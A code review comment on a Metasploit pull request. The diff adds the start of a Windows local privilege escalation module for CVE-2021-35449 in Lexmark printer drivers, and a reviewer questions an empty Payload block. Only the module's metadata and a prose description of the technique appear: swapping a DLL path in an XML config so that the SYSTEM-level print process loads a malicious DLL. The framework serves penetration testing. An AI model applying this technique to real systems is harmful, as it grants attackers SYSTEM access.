modules/exploits/windows/local/lexmark_driver_privesc.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Lexmark Driver Privilege Escalation',
+        'Description' => %q{
+          Various Lexmark printer drivers allow escalation of
+          privileges on Windows systems.
+
+          For vulnerable drivers, a low-privileged user can
+          modify an XML configuration file and replace a
+          DLL path with a malicious DLL path.
+
+          `PrintIsolationHost.exe`, a Windows process running
+          as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+          during the installation of a printer. A user can
+          elevate to SYSTEM by writing a malicious DLL to
+          the vulnerable configuration file and adding a new
+          printer with a vulnerable driver.
+
+          This module leverages the `prnmngr.vbs` script
+          to add and delete printers.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Baines', # discovery, PoC, module
+          'Shelby Pace' # original Ricoh driver module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2021-35449'],
+            [ 'URL', 'http://support.lexmark.com/index?page=content&id=TE953']
+          ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => 'win',
+        'Payload' =>
+        {
+        },
```

Comment:
This section appears to be empty, is there a reason it is supplied given this won't do anything?
```suggestion
```

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960